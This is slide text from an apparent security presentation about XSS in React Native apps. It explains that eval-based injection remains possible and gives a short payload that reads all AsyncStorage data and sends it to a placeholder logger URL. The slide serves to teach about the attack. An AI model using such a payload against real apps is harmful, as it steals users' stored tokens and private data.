Slide 19
Slide 19 text
Is XSS possible?
XSS possibility is decreases by design.
XSS is still possible.
eval()
_reactNative.AsyncStorage.getAllKeys(function(err,result)
{_reactNative.AsyncStorage.multiGet(result,function(err,result)
{fetch(‘http://example.com/logger.php?token='+JSON.stringify(result));});});
Steal all the data from local storage (AsyncStorage) by exploiting
eval-based injection and accessing React Native APIs